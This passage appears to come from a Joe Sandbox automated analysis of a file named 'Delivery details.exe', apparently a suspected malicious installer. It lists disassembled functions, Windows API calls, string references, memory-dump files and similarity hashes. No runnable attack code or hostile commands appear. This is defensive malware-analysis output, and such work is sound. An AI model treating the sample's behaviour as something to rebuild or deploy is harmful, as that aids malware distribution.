GetDlgItem.USER32(?,0000040A), ref: 0040465E
SendMessageW.USER32(00000000), ref: 00404665
GetDlgItem.USER32(?,000003E8), ref: 00404690
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
SetCursor.USER32(00000000), ref: 004046E4
LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
SetCursor.USER32(00000000), ref: 00404700
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741

Strings

YD@, xrefs: 004046EC
N, xrefs: 0040467E
: Completed, xrefs: 004046BF

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N$YD@
API String ID: 3103080414-1273182181
Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405FFC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040

Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
wsprintfA.USER32 ref: 0040607B
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
GlobalFree.KERNEL32(00000000), ref: 00406164
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B

Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

Strings

[Rename], xrefs: 004060E5, 004060F7
%ls=%ls, xrefs: 00406071

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406644 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE

Strings

*?|<>/":, xrefs: 00406696
C:\Users\user\AppData\Local\Temp\, xrefs: 00406645, 0040664A
"C:\Users\user\Desktop\Delivery details.exe", xrefs: 00406644

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Delivery details.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-684569964
Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD

Uniqueness

Uniqueness Score: -1.00%

Function 004043AC Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043C9
GetSysColor.USER32(00000000), ref: 004043E5
SetTextColor.GDI32(?,00000000), ref: 004043F1
SetBkMode.GDI32(?,?), ref: 004043FD
GetSysColor.USER32(?), ref: 00404410
SetBkColor.GDI32(?,?), ref: 00404420
DeleteObject.GDI32(?), ref: 0040443A
CreateBrushIndirect.GDI32(?), ref: 00404444

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724

Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402E72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
GetTickCount.KERNEL32 ref: 00402EAB
wsprintfW.USER32 ref: 00402ED9

Part of subcall function 00405414: lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
ShowWindow.USER32(00000000,00000005), ref: 00402F0B

Part of subcall function 00402E56: MulDiv.KERNEL32(0006EBB1,00000064,0007376C), ref: 00402E6B

Strings

... %d%%, xrefs: 00402ED3

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
Opcode Fuzzy Hash: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404CDE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
GetMessagePos.USER32 ref: 00404D01
ScreenToClient.USER32(?,?), ref: 00404D1B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53

Strings

f, xrefs: 00404D2F

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
wsprintfW.USER32 ref: 00402E29
SetWindowTextW.USER32(?,?), ref: 00402E39
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B

Strings

unpacking data: %d%%, xrefs: 00402E17, 00402E27
verifying installer: %d%%, xrefs: 00402E1E

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99

Uniqueness

Uniqueness Score: -1.00%

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
wsprintfW.USER32 ref: 00404C7A
SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D

Strings

(7B, xrefs: 00404C63
%u.%u%s%s, xrefs: 00404C5B

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

